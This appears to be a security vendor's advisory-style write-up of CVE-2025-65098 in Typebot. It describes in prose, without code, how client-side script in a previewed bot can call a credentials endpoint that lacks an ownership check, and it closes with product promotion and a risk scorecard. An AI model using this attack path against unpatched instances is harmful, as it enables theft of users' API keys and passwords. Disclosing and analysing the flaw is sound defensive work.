Typebot Credential Theft Trick (CVE-2025-65098)
Key Takeaways
- A malicious Typebot can run client-side JavaScript when a victim clicks “Run.”
- An API endpoint can return plaintext credentials without verifying ownership.
- Impact includes theft of OpenAI keys, Google Sheets tokens, and SMTP passwords.
- Exploitation requires user interaction, but not elevated privileges.
- Fixes are available, and upgrading removes the vulnerable behavior.
Typebot’s “Run” Preview Could Leak Your AI Secrets
A high-severity vulnerability in Typebot, an open-source chatbot builder, can allow attackers to steal stored credentials from other users. The attack chain combines client-side script execution during bot preview with an authorization weakness that exposes plaintext secrets via an API endpoint. If a victim previews a malicious typebot and clicks “Run,” the attacker’s script can execute in the victim’s browser and retrieve sensitive credentials, including OpenAI API keys, Google Sheets tokens, and SMTP passwords. (NVD)
What We Know
The issue is tracked as CVE-2025-65098 and GHSA-4xc5-wfwc-jw47, published on January 22, 2026. Typebot’s advisory describes a scenario where a malicious actor creates a typebot containing a Script block configured to “execute on client.” When a victim previews the typebot and clicks “Run,” the embedded JavaScript executes in the victim’s browser within an authenticated session context. (GitHub)
In addition, the advisory describes an API endpoint, /api/trpc/credentials.getCredentials, that returns plaintext credentials but does not verify that the authenticated user owns the requested credential ID. This creates an insecure direct object reference style condition, where an attacker can enumerate or guess IDs and retrieve secrets that belong to other users.
The GitHub CNA score listed in NVD is CVSS 3.1: 7.4 (High) with user interaction required. (NVD)
How the Breach Happened
This incident is best understood as a chained vulnerability that turns a normal product workflow into a credential theft path.
First, Typebot includes a Script block feature that can execute JavaScript on the client when configured to do so. In practice, this means an attacker can embed code that runs inside the victim’s browser when the victim previews the bot and clicks “Run.” Because the code executes in the context of the victim’s authenticated session, it can make same-origin requests to Typebot APIs as the victim. (GitHub)
Second, the credentials retrieval endpoint returns secrets in plaintext and performs an authentication check, but not an ownership authorization check. As described in the advisory, this allows an attacker-controlled script to fetch credential records that belong to the victim or potentially other users, depending on accessible IDs and scope. The result is direct exfiltration of sensitive secrets like OpenAI API keys, Google Sheets tokens, and SMTP passwords.
This is an AI-adjacent security failure because it targets the operational secrets that power AI workflows, especially LLM API keys, which can enable downstream misuse, fraud, or data exposure once stolen.
Why It Matters
This vulnerability highlights a recurring problem in AI-enabled app ecosystems: the security boundary often collapses around the credentials that connect AI apps to models, data stores, and messaging systems.
If OpenAI keys are stolen, an attacker can potentially run unauthorized workloads, rack up usage costs, or probe connected AI functionality depending on how keys are scoped and monitored. If Google Sheets tokens or SMTP credentials are exposed, the blast radius expands beyond the AI app into business systems that handle customer data, outbound communications, or internal workflows.
The user interaction requirement may reduce opportunistic exploitation, but it aligns with realistic social engineering patterns. An attacker only needs a victim to preview or test a bot. In collaborative environments where bots are shared, copied, or reviewed, that is a credible path. Finally, because the endpoint returns plaintext secrets, the consequence of a single successful exploitation is immediate and difficult to unwind without full credential rotation.
PointGuard AI Perspective
Incidents like CVE-2025-65098 are a reminder that many AI security failures are not only about model behavior. They are also about the surrounding control plane: credentials, tool integrations, and the runtime pathways that connect AI apps to sensitive systems.
PointGuard AI helps teams reduce risk from credential exposure and AI workflow abuse with practical, AI-focused controls:
- Runtime visibility into AI app interactions: When AI applications or agent workflows call external tools, APIs, or model endpoints, monitoring prompt and response flows helps identify suspicious behavior patterns that often accompany credential misuse or data access anomalies.
Source: AI Runtime Defense (PointGuard AI) - AI-native detection for injection-style abuse: While this incident is primarily an XSS and authorization failure, the attacker’s goal is similar to prompt and context manipulation: causing systems to reveal secrets through allowed pathways. Understanding and detecting injection-style tactics across AI surfaces is essential as assistants and agents become more integrated with tools.
Source: What is Prompt Injection? (PointGuard AI) - Operational learning from real incidents: Security teams move faster when they can track patterns across AI incidents, including how credentials, connectors, and agent workflows become leverage points for attackers.
Source: AI Security Incident Tracker (PointGuard AI)
Forward-looking takeaway: as AI apps become more collaborative and more connected to enterprise systems, preventing secret exposure requires both strong authorization controls and continuous runtime monitoring of AI-driven workflows.
Incident Scorecard Details
Total AISSI Score: 7.6/10
Criticality = 8.0, Theft of high-value secrets (LLM keys, tokens, SMTP creds), AISSI weighting: 25%
Propagation = 6.5, Requires sharing or previewing malicious typebots, AISSI weighting: 20%
Exploitability = 7.0, Low complexity but requires user interaction, AISSI weighting: 15%
Supply Chain = 6.5, Affects a popular open-source chatbot builder and related packages, AISSI weighting: 15%
Business Impact = 8.0, Potential for rapid financial abuse and downstream system compromise via stolen credentials, AISSI weighting: 25%
Sources
